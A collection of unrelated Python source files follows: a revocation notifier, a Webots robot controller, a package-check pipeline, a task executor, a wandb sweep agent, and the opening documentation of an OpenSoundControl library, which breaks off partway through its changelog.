broker_proc = Process(target=worker, name="zeroMQ")
broker_proc.start()
def stop_broker():
if broker_proc is not None:
# Remove the socket file before we kill the process
if os.path.exists(f"ipc://{_SOCKET_PATH}"):
os.remove(f"ipc://{_SOCKET_PATH}")
logger.info("Stopping revocation notifier...")
broker_proc.terminate()
broker_proc.join(5)
if broker_proc.is_alive():
logger.debug("Killing revocation notifier because it did not terminate after 5 seconds...")
broker_proc.kill()
def notify(tosend):
assert config.getboolean("cloud_verifier", "revocation_notifier")
try:
import zmq # pylint: disable=import-outside-toplevel
except ImportError as error:
raise Exception("install PyZMQ for 'revocation_notifier' option") from error
# python-requests internally uses either simplejson (preferred) or
# the built-in json module, and when it is using the built-in one,
# it may encounter difficulties handling bytes instead of strings.
# To avoid such issues, let's convert `tosend' to str beforehand.
tosend = json.bytes_to_str(tosend)
def worker(tosend):
context = zmq.Context()
mysock = context.socket(zmq.PUB)
mysock.connect(f"ipc://{_SOCKET_PATH}")
# wait 100ms for connect to happen
time.sleep(0.2)
# now send it out via 0mq
logger.info("Sending revocation event to listening nodes...")
for i in range(config.getint("cloud_verifier", "max_retries")):
try:
mysock.send_string(json.dumps(tosend))
break
except Exception as e:
interval = config.getfloat("cloud_verifier", "retry_interval")
exponential_backoff = config.getboolean("cloud_verifier", "exponential_backoff")
next_retry = retry.retry_time(exponential_backoff, interval, i, logger)
logger.debug(
"Unable to publish revocation message %d times, trying again in %f seconds: %s", i, next_retry, e
)
time.sleep(next_retry)
mysock.close()
cb = functools.partial(worker, tosend)
t = threading.Thread(target=cb)
t.start()
def notify_webhook(tosend):
url = config.get("cloud_verifier", "webhook_url", fallback="")
# Check if a url was specified
if url == "":
return
# Similarly to notify(), let's convert `tosend' to str to prevent
# possible issues with json handling by python-requests.
tosend = json.bytes_to_str(tosend)
def worker_webhook(tosend, url):
interval = config.getfloat("cloud_verifier", "retry_interval")
exponential_backoff = config.getboolean("cloud_verifier", "exponential_backoff")
session = requests.session()
logger.info("Sending revocation event via webhook...")
for i in range(config.getint("cloud_verifier", "max_retries")):
next_retry = retry.retry_time(exponential_backoff, interval, i, logger)
try:
response = session.post(url, json=tosend, timeout=5)
if response.status_code in [200, 202]:
break
logger.debug(
"Unable to publish revocation message %d times via webhook, "
"trying again in %d seconds. "
"Server returned status code: %s",
i,
next_retry,
response.status_code,
)
except requests.exceptions.RequestException as e:
logger.debug(
"Unable to publish revocation message %d times via webhook, " "trying again in %d seconds: %s",
i,
next_retry,
e,
)
time.sleep(next_retry)
w = functools.partial(worker_webhook, tosend, url)
t = threading.Thread(target=w, daemon=True)
t.start()
cert_key = None
def await_notifications(callback, revocation_cert_path):
# keep old typo "listen_notfications" around for a few versions
assert config.getboolean("cloud_agent", "listen_notifications", fallback=False) or config.getboolean(
"cloud_agent", "listen_notfications", fallback=False
)
try:
import zmq # pylint: disable=import-outside-toplevel
except ImportError as error:
raise Exception("install PyZMQ for 'listen_notifications' option") from error
global cert_key
if revocation_cert_path is None:
raise Exception("must specify revocation_cert_path")
context = zmq.Context()
mysock = context.socket(zmq.SUB)
mysock.setsockopt(zmq.SUBSCRIBE, b"")
mysock.connect(
f"tcp://{config.get('general', 'receive_revocation_ip')}:"
f"{config.getint('general', 'receive_revocation_port')}"
)
logger.info(
"Waiting for revocation messages on 0mq %s:%s",
config.get("general", "receive_revocation_ip"),
config.getint("general", "receive_revocation_port"),
)
while True:
rawbody = mysock.recv()
body = json.loads(rawbody)
if cert_key is None:
# load up the CV signing public key
if revocation_cert_path is not None and os.path.exists(revocation_cert_path):
logger.info("Lazy loading the revocation certificate from %s", revocation_cert_path)
with open(revocation_cert_path, "rb") as f:
certpem = f.read()
cert_key = crypto.x509_import_pubkey(certpem)
if cert_key is None:
logger.warning("Unable to check signature of revocation message: %s not available", revocation_cert_path)
elif "signature" not in body or body["signature"] == "none":
logger.warning("No signature on revocation message from server")
elif not crypto.rsa_verify(cert_key, body["msg"].encode("utf-8"), body["signature"].encode("utf-8")):
logger.error("Invalid revocation message siganture %s", body)
else:
message = json.loads(body["msg"])
logger.debug("Revocation signature validated for revocation: %s", message)
callback(message)
def main():
start_broker()
def worker():
def print_notification(revocation):
logger.warning("Received revocation: %s", revocation)
keypath = os.path.join(secure_mount.mount(), "unzipped", "RevocationNotifier-cert.crt")
await_notifications(print_notification, revocation_cert_path=keypath)
t = threading.Thread(target=worker)
t.start()
# time.sleep(0.5)
json_body2 = {
"v": "vbaby",
"agent_id": "2094aqrea3",
"cloudagent_ip": "ipaddy",
"cloudagent_port": "39843",
"tpm_policy": '{"ab":"1"}',
"metadata": '{"cert_serial":"1"}',
"allowlist": "{}",
"ima_sign_verification_keys": "{}",
"revocation_key": "",
"revocation": '{"cert_serial":"1"}',
}
print("sending notification")
notify(json_body2)
time.sleep(2)
print("shutting down")
stop_broker()
print("exiting...")
sys.exit(0)
print("done")
if __name__ == "__main__":
main()
|
4wheels.py
|
#codigo por
#Eduardo Migueis
#Illy Bordini
#Guilherme Lima
from controller import Robot, Motor, DistanceSensor, Camera
import requests
from PIL import Image
import threading
import time
# cria a instancia do robo
robot = Robot()
time_step = 64
max_speed = 6.28
# motor
# rodas da frente
right_motor_front = robot.getDevice('wheel_rf')
right_motor_front.setPosition(float('inf'))
right_motor_front.setVelocity(0.0)
left_motor_front = robot.getDevice('wheel_lf')
left_motor_front.setPosition(float('inf'))
left_motor_front.setVelocity(0.0)
# rodas de traz
right_motor_back = robot.getDevice('wheel_rb')
right_motor_back.setPosition(float('inf'))
right_motor_back.setVelocity(0.0)
left_motor_back = robot.getDevice('wheel_lb')
left_motor_back.setPosition(float('inf'))
left_motor_back.setVelocity(0.0)
# sensor de IR
right_ir = robot.getDevice('RIGHT')
right_ir.enable(time_step)
mid_ir = robot.getDevice('MID')
mid_ir.enable(time_step)
left_ir = robot.getDevice('LEFT')
left_ir.enable(time_step)
camera = robot.getDevice("camera")
camera.enable(time_step)
#thread que aciona o server para abrir uma instancia do
#chrome a cada dez segundos com uma nova foto
def sendImg():
while 1 == 1:
time.sleep(10)
img = camera.getImage()
camera.saveImage("photo.png", 100)
requests.post('http://localhost:5000/api/img')
counter = 0
# Main loop:
# - efetua os passos da simulacao ate que o Webots pare o controller
while robot.step(time_step) != -1:
if counter == 0:
print("malygno")
x = threading.Thread(target=sendImg)
x.start()
counter = 1
# le-se os sensores:
right_ir_val = right_ir.getValue()
mid_ir_val = mid_ir.getValue()
left_ir_val = left_ir.getValue()
left_speed_f = max_speed # _f for front
right_speed_f = max_speed # _f for front
left_speed_b = max_speed # _b for back
right_speed_b = max_speed # _b for back
# Processamento dos dados do sensor.
if left_ir_val < 300 and right_ir_val < 300 and mid_ir_val >= 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(right_speed_b)
if left_ir_val < 300 and right_ir_val >= 300 and mid_ir_val >= 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(0)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(0)
if left_ir_val >= 300 and right_ir_val < 300 and mid_ir_val >= 300:
left_motor_front.setVelocity(0)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(0)
right_motor_back.setVelocity(right_speed_b)
if left_ir_val >= 300 and right_ir_val < 300 and mid_ir_val < 300:
left_motor_front.setVelocity(0)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(0)
right_motor_back.setVelocity(right_speed_b)
if left_ir_val < 300 and right_ir_val >= 300 and mid_ir_val < 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(0)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(0)
if left_ir_val < 300 and right_ir_val < 300 and mid_ir_val < 300:
left_motor_front.setVelocity(left_speed_f)
right_motor_front.setVelocity(right_speed_f)
left_motor_back.setVelocity(left_speed_b)
right_motor_back.setVelocity(right_speed_b)
pass
|
pipeline.py
|
"""Pipeline building support for connecting sources and checks."""
import os
import traceback
from collections import defaultdict, deque
from concurrent.futures import ThreadPoolExecutor
from itertools import chain
from multiprocessing import Pool, Process, SimpleQueue
from pkgcore.package.errors import MetadataException
from pkgcore.restrictions import boolean, packages
from . import base
from .results import MetadataError
from .sources import UnversionedSource, VersionedSource
class Pipeline:
"""Check-running pipeline leveraging scope-based parallelism."""
def __init__(self, options, scan_scope, pipes, restrict):
self.options = options
self.scan_scope = scan_scope
self.pipes = pipes
self.restrict = restrict
self.jobs = options.jobs
self.pkg_scan = (
scan_scope in (base.version_scope, base.package_scope) and
isinstance(restrict, boolean.AndRestriction))
def _queue_work(self, scoped_pipes, work_q, results_q):
"""Producer that queues scanning tasks against granular scope restrictions."""
try:
for scope in sorted(scoped_pipes['sync'], reverse=True):
pipes = scoped_pipes['sync'][scope]
if scope is base.version_scope:
versioned_source = VersionedSource(self.options)
for restrict in versioned_source.itermatch(self.restrict):
for i in range(len(pipes)):
work_q.put((scope, restrict, i))
elif scope is base.package_scope:
unversioned_source = UnversionedSource(self.options)
for restrict in unversioned_source.itermatch(self.restrict):
work_q.put((scope, restrict, 0))
else:
for i in range(len(pipes)):
work_q.put((scope, self.restrict, i))
# insert flags to notify consumers that no more work exists
for i in range(self.jobs):
work_q.put(None)
# schedule all async checks from a single process
for scope, pipes in scoped_pipes['async'].items():
for pipe in pipes:
pipe.run(self.restrict)
except Exception as e:
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
results_q.put((e, tb))
def _run_checks(self, pipes, work_q, results_q):
"""Consumer that runs scanning tasks, queuing results for output."""
try:
for scope, restrict, pipe_idx in iter(work_q.get, None):
if scope is base.version_scope:
results_q.put(list(pipes[scope][pipe_idx].run(restrict)))
elif scope in (base.package_scope, base.category_scope):
results = []
for pipe in pipes[scope]:
results.extend(pipe.run(restrict))
results_q.put(results)
else:
results = []
pipe = pipes[scope][pipe_idx]
pipe.start()
results.extend(pipe.run(restrict))
results.extend(pipe.finish())
results_q.put(results)
except Exception as e:
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
results_q.put((e, tb))
def run(self, results_q):
"""Run the scanning pipeline in parallel by check and scanning scope."""
# initialize checkrunners per source type, using separate runner for async checks
try:
checkrunners = defaultdict(list)
for pipe_mapping in self.pipes:
for (source, exec_type), checks in pipe_mapping.items():
if exec_type == 'async':
runner = AsyncCheckRunner(
self.options, source, checks, results_q=results_q)
else:
runner = CheckRunner(self.options, source, checks)
checkrunners[(source.feed_type, exec_type)].append(runner)
# categorize checkrunners for parallelization based on the scan and source scope
scoped_pipes = defaultdict(lambda: defaultdict(list))
if self.pkg_scan:
for (scope, exec_type), runners in checkrunners.items():
if scope is base.version_scope:
scoped_pipes[exec_type][base.version_scope].extend(runners)
else:
scoped_pipes[exec_type][base.package_scope].extend(runners)
else:
for (scope, exec_type), runners in checkrunners.items():
if scope in (base.version_scope, base.package_scope):
scoped_pipes[exec_type][base.package_scope].extend(runners)
else:
scoped_pipes[exec_type][scope].extend(runners)
work_q = SimpleQueue()
# split target restriction into tasks for parallelization
p = Process(target=self._queue_work, args=(scoped_pipes, work_q, results_q))
p.start()
# run synchronous checks using process pool, queuing generated results for reporting
pool = Pool(self.jobs, self._run_checks, (scoped_pipes['sync'], work_q, results_q))
pool.close()
p.join()
pool.join()
results_q.put(None)
except Exception as e:
# traceback can't be pickled so serialize it
tb = traceback.format_exc()
results_q.put((e, tb))
class CheckRunner:
"""Generic runner for checks.
Checks are run in order of priority. Some checks need to be run before
others if both are enabled due to package attribute caching in pkgcore,
e.g. checks that test depset parsing need to come before other checks that
use the parsed deps otherwise results from parsing errors could be missed.
"""
def __init__(self, options, source, checks):
self.options = options
self.source = source
self.checks = sorted(checks)
self._running_check = None
scope = base.version_scope
self._known_results = set()
for check in self.checks:
if check.scope < scope:
scope = check.scope
self._known_results.update(check.known_results)
self._itermatch_kwargs = {}
# only use set metadata error callback for version scope runners
if scope is base.version_scope:
self._itermatch_kwargs['error_callback'] = self._metadata_error_cb
self._metadata_errors = deque()
def _metadata_error_cb(self, e):
"""Callback handling MetadataError related results."""
cls = MetadataError.result_mapping.get(e.attr, MetadataError)
process_callback = (
cls is MetadataError or
cls in getattr(self._running_check, 'known_results', self._known_results)
)
if process_callback:
error_str = ': '.join(e.msg().split('\n'))
result = cls(e.attr, error_str, pkg=e.pkg)
self._metadata_errors.append((e.pkg, result))
def start(self):
for check in self.checks:
check.start()
def run(self, restrict=packages.AlwaysTrue):
"""Run registered checks against all matching source items."""
try:
source = self.source.itermatch(restrict, **self._itermatch_kwargs)
except AttributeError:
source = self.source
for item in source:
for check in self.checks:
self._running_check = check
try:
yield from check.feed(item)
except MetadataException as e:
self._metadata_error_cb(e)
self._running_check = None
while self._metadata_errors:
pkg, result = self._metadata_errors.popleft()
# Only show metadata errors for packages matching the current
# restriction to avoid duplicate reports.
if restrict.match(pkg):
yield result
def finish(self):
for check in self.checks:
yield from check.finish()
def __eq__(self, other):
return (
self.__class__ is other.__class__ and
frozenset(self.checks) == frozenset(other.checks))
def __hash__(self):
return hash(frozenset(self.checks))
def __repr__(self):
checks = ', '.join(sorted(str(check) for check in self.checks))
return f'{self.__class__.__name__}({checks})'
class AsyncCheckRunner(CheckRunner):
"""Generic runner for asynchronous checks.
Checks that would otherwise block for uncertain amounts of time due to I/O
or network access are run in separate threads, queuing any relevant results
on completion.
"""
def __init__(self, *args, results_q, **kwargs):
super().__init__(*args, **kwargs)
self.results_q = results_q
def run(self, restrict=packages.AlwaysTrue):
try:
source = self.source.itermatch(restrict, **self._itermatch_kwargs)
except AttributeError:
source = self.source
with ThreadPoolExecutor(max_workers=self.options.tasks) as executor:
futures = {}
for item in source:
for check in self.checks:
check.schedule(item, executor, futures, self.results_q)
|
executor.py
|
"""Server-like task scheduler and processor."""
import abc
import threading
import six
from jarvis.worker import base
RETRY_INTERVAL = 0.1
@six.add_metaclass(abc.ABCMeta)
class Executor(base.Worker):
"""Contract class for all the executors."""
def __init__(self, delay, loop):
super(Executor, self).__init__()
self._queue = []
self._delay = delay
self._loop = loop
self._stop_event = threading.Event()
@abc.abstractmethod
def on_task_done(self, task, result):
"""What to execute after successfully finished processing a task."""
pass
@abc.abstractmethod
def on_task_fail(self, task, exc):
"""What to do when the program fails processing a task."""
pass
@abc.abstractmethod
def on_interrupted(self):
"""What to execute when keyboard interrupts arrive."""
pass
def _get_task(self):
"""Retrieves a task from the queue."""
if self._queue:
return self._queue.pop()
def _work(self, task):
"""Run the received task and process the result."""
# pylint: disable=broad-except
try:
return task.run()
except Exception as exc:
self.on_task_fail(task, exc)
def put_task(self, task):
"""Adds a task to the tasks queue."""
if not isinstance(task, base.Task):
raise ValueError("Invalid type of task provided.")
self._queue.append(task)
def run(self):
"""Processes incoming tasks."""
self.prologue()
while not self._stop_event.is_set():
try:
task = self._get_task()
if task:
self._work(task)
if not self._loop:
break
except KeyboardInterrupt:
self.on_interrupted()
break
self.epilogue()
@six.add_metaclass(abc.ABCMeta)
class ConcurrentExecutor(Executor):
"""Abstract base class for concurrent workers."""
def __init__(self, delay, workers_count, queue_size):
"""Instantiates with custom number thread safe objects."""
super(ConcurrentExecutor, self).__init__(delay, workers_count)
self._queue = six.moves.queue.Queue(queue_size)
def _put_task(self, task):
"""Adds a task to the queue."""
self._queue.put(task)
def _get_task(self):
"""Retrieves a task from the queue."""
return self._queue.get()
def _start_worker(self):
"""Create a custom worker and return its object."""
def _worker(self):
"""Worker able to retrieve and process tasks."""
while not self._stop.is_set():
task = self._get_task()
if task:
self._work(task)
worker = threading.Thread(target=_worker)
worker.setDaemon(True)
worker.start()
return worker
@abc.abstractmethod
def task_generator(self):
"""Override this with your custom task generator."""
pass
def on_task_done(self, task, result):
"""What to execute after successfully finished processing a task."""
self._queue.task_done()
def on_task_fail(self, task, exc):
"""What to do when the program fails processing a task."""
pass
def on_interrupted(self):
"""Mark the processing as stopped."""
self._stop_event.set()
super(ConcurrentExecutor, self).on_interrupted()
|
pyagent.py
|
# -*- coding: utf-8 -*-
"""Agent - Agent object.
Manage wandb agent.
"""
from __future__ import print_function
import ctypes
import logging
import os
import socket
import threading
import time
from six.moves import queue
import wandb
from wandb import util
from wandb import wandb_sdk
from wandb.apis import InternalApi
logger = logging.getLogger(__name__)
def _terminate_thread(thread):
if not thread.is_alive():
return
if hasattr(thread, "_terminated"):
return
thread._terminated = True
tid = getattr(thread, "_thread_id", None)
if tid is None:
for k, v in threading._active.items():
if v is thread:
tid = k
if tid is None:
# This should never happen
return
logger.debug("Terminating thread: {}".format(tid))
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(tid), ctypes.py_object(Exception)
)
if res == 0:
# This should never happen
return
elif res != 1:
# Revert
logger.debug("Termination failed for thread {}".format(tid))
ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), None)
class Job(object):
def __init__(self, command):
self.command = command
job_type = command.get("type")
self.type = job_type
self.run_id = command.get("run_id")
self.config = command.get("args")
def __repr__(self):
if self.type == "run":
return "Job({},{},{})".format(self.run_id, self.config, self.command)
elif self.type == "stop":
return "stop({})".format(self.run_id)
else:
return "exit"
class RunStatus:
QUEUED = "QUEUED"
RUNNING = "RUNNING"
STOPPED = "STOPPED"
ERRORED = "ERRORED"
DONE = "DONE"
class Agent(object):
FLAPPING_MAX_SECONDS = 60
FLAPPING_MAX_FAILURES = 3
MAX_INITIAL_FAILURES = 5
def __init__(
self, sweep_id=None, project=None, entity=None, function=None, count=None
):
self._sweep_path = sweep_id
self._sweep_id = None
self._project = project
self._entity = entity
self._function = function
self._count = count
# glob_config = os.path.expanduser('~/.config/wandb/settings')
# loc_config = 'wandb/settings'
# files = (glob_config, loc_config)
self._api = InternalApi()
self._agent_id = None
self._max_initial_failures = wandb.env.get_agent_max_initial_failures(
self.MAX_INITIAL_FAILURES
)
# if the directory to log to is not set, set it
if os.environ.get(wandb.env.DIR) is None:
os.environ[wandb.env.DIR] = os.path.abspath(os.getcwd())
def _init(self):
# These are not in constructor so that Agent instance can be rerun
self._run_threads = {}
self._run_status = {}
self._queue = queue.Queue()
self._exit_flag = False
self._exceptions = {}
self._start_time = time.time()
def _register(self):
logger.debug("Agent._register()")
agent = self._api.register_agent(socket.gethostname(), sweep_id=self._sweep_id)
self._agent_id = agent["id"]
logger.debug("agent_id = {}".format(self._agent_id))
def _setup(self):
logger.debug("Agent._setup()")
self._init()
parts = dict(entity=self._entity, project=self._project, name=self._sweep_path)
err = util.parse_sweep_id(parts)
if err:
wandb.termerror(err)
return
entity = parts.get("entity") or self._entity
project = parts.get("project") or self._project
sweep_id = parts.get("name") or self._sweep_id
if sweep_id:
os.environ[wandb.env.SWEEP_ID] = sweep_id
if entity:
wandb.env.set_entity(entity)
if project:
wandb.env.set_project(project)
if sweep_id:
self._sweep_id = sweep_id
self._register()
def _stop_run(self, run_id):
logger.debug("Stopping run {}.".format(run_id))
self._run_status[run_id] = RunStatus.STOPPED
thread = self._run_threads.get(run_id)
if thread:
_terminate_thread(thread)
def _stop_all_runs(self):
logger.debug("Stopping all runs.")
for run in list(self._run_threads.keys()):
self._stop_run(run)
def _exit(self):
self._stop_all_runs()
self._exit_flag = True
# _terminate_thread(self._main_thread)
def _heartbeat(self):
while True:
if self._exit_flag:
return
# if not self._main_thread.is_alive():
# return
run_status = {
run: True
for run, status in self._run_status.items()
if status in (RunStatus.QUEUED, RunStatus.RUNNING)
}
commands = self._api.agent_heartbeat(self._agent_id, {}, run_status)
if commands:
job = Job(commands[0])
logger.debug("Job received: {}".format(job))
if job.type in ["run", "resume"]:
self._queue.put(job)
self._run_status[job.run_id] = RunStatus.QUEUED
elif job.type == "stop":
self._stop_run(job.run_id)
elif job.type == "exit":
self._exit()
return
time.sleep(5)
def _run_jobs_from_queue(self): # noqa:C901
global _INSTANCES
_INSTANCES += 1
try:
waiting = False
count = 0
while True:
if self._exit_flag:
return
try:
try:
job = self._queue.get(timeout=5)
if self._exit_flag:
logger.debug("Exiting main loop due to exit flag.")
wandb.termlog("Sweep Agent: Exiting.")
return
except queue.Empty:
if not waiting:
logger.debug("Paused.")
wandb.termlog("Sweep Agent: Waiting for job.")
waiting = True
time.sleep(5)
if self._exit_flag:
logger.debug("Exiting main loop due to exit flag.")
wandb.termlog("Sweep Agent: Exiting.")
return
continue
if waiting:
logger.debug("Resumed.")
wandb.termlog("Job received.")
waiting = False
count += 1
run_id = job.run_id
if self._run_status[run_id] == RunStatus.STOPPED:
continue
logger.debug("Spawning new thread for run {}.".format(run_id))
thread = threading.Thread(target=self._run_job, args=(job,))
self._run_threads[run_id] = thread
thread.start()
self._run_status[run_id] = RunStatus.RUNNING
thread.join()
logger.debug("Thread joined for run {}.".format(run_id))
if self._run_status[run_id] == RunStatus.RUNNING:
self._run_status[run_id] = RunStatus.DONE
elif self._run_status[run_id] == RunStatus.ERRORED:
exc = self._exceptions[run_id]
logger.error("Run {} errored: {}".format(run_id, repr(exc)))
wandb.termerror("Run {} errored: {}".format(run_id, repr(exc)))
if os.getenv(wandb.env.AGENT_DISABLE_FLAPPING) == "true":
self._exit_flag = True
return
elif (
time.time() - self._start_time < self.FLAPPING_MAX_SECONDS
) and (len(self._exceptions) >= self.FLAPPING_MAX_FAILURES):
msg = "Detected {} failed runs in the first {} seconds, killing sweep.".format(
self.FLAPPING_MAX_FAILURES, self.FLAPPING_MAX_SECONDS
)
logger.error(msg)
wandb.termerror(msg)
wandb.termlog(
"To disable this check set WANDB_AGENT_DISABLE_FLAPPING=true"
)
self._exit_flag = True
return
if (
self._max_initial_failures < len(self._exceptions)
and len(self._exceptions) >= count
):
msg = "Detected {} failed runs in a row at start, killing sweep.".format(
self._max_initial_failures
)
logger.error(msg)
wandb.termerror(msg)
wandb.termlog(
"To change this value set WANDB_AGENT_MAX_INITIAL_FAILURES=val"
)
self._exit_flag = True
return
if self._count and self._count == count:
logger.debug("Exiting main loop because max count reached.")
self._exit_flag = True
return
except KeyboardInterrupt:
logger.debug("Ctrl + C detected. Stopping sweep.")
wandb.termlog("Ctrl + C detected. Stopping sweep.")
self._exit()
return
except Exception as e:
if self._exit_flag:
logger.debug("Exiting main loop due to exit flag.")
wandb.termlog("Sweep Agent: Killed.")
return
else:
raise e
finally:
_INSTANCES -= 1
def _run_job(self, job):
try:
run_id = job.run_id
runqueue_item_id = job.command.get("runqueue_item_id")
config_file = os.path.join(
"wandb", "sweep-" + self._sweep_id, "config-" + run_id + ".yaml"
)
os.environ[wandb.env.RUN_ID] = run_id
os.environ[wandb.env.RUNQUEUE_ITEM_ID] = runqueue_item_id
base_dir = os.environ.get(wandb.env.DIR, "")
sweep_param_path = os.path.join(base_dir, config_file)
os.environ[wandb.env.SWEEP_PARAM_PATH] = sweep_param_path
wandb.wandb_lib.config_util.save_config_file_from_dict(
sweep_param_path, job.config
)
os.environ[wandb.env.SWEEP_ID] = self._sweep_id
wandb_sdk.wandb_setup._setup(_reset=True)
wandb.termlog("Agent Starting Run: {} with config:".format(run_id))
for k, v in job.config.items():
wandb.termlog("\t{}: {}".format(k, v["value"]))
self._function()
wandb.finish()
except KeyboardInterrupt as ki:
raise ki
except Exception as e:
wandb.finish(exit_code=1)
if self._run_status[run_id] == RunStatus.RUNNING:
self._run_status[run_id] = RunStatus.ERRORED
self._exceptions[run_id] = e
finally:
# clean up the environment changes made
os.environ.pop(wandb.env.RUN_ID, None)
os.environ.pop(wandb.env.RUNQUEUE_ITEM_ID, None)
os.environ.pop(wandb.env.SWEEP_ID, None)
os.environ.pop(wandb.env.SWEEP_PARAM_PATH, None)
def run(self):
logger.info(
"Starting sweep agent: entity={}, project={}, count={}".format(
self._entity, self._project, self._count
)
)
self._setup()
# self._main_thread = threading.Thread(target=self._run_jobs_from_queue)
self._heartbeat_thread = threading.Thread(target=self._heartbeat)
self._heartbeat_thread.daemon = True
# self._main_thread.start()
self._heartbeat_thread.start()
# self._main_thread.join()
self._run_jobs_from_queue()
def pyagent(sweep_id, function, entity=None, project=None, count=None):
"""Generic agent entrypoint, used for CLI or jupyter.
Arguments:
sweep_id (dict): Sweep ID generated by CLI or sweep API
function (func, optional): A function to call instead of the "program"
entity (str, optional): W&B Entity
project (str, optional): W&B Project
count (int, optional): the number of trials to run.
"""
if not callable(function):
raise Exception("function paramter must be callable!")
agent = Agent(
sweep_id, function=function, entity=entity, project=project, count=count,
)
agent.run()
_INSTANCES = 0
def is_running():
return bool(_INSTANCES)
|
OSC2.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
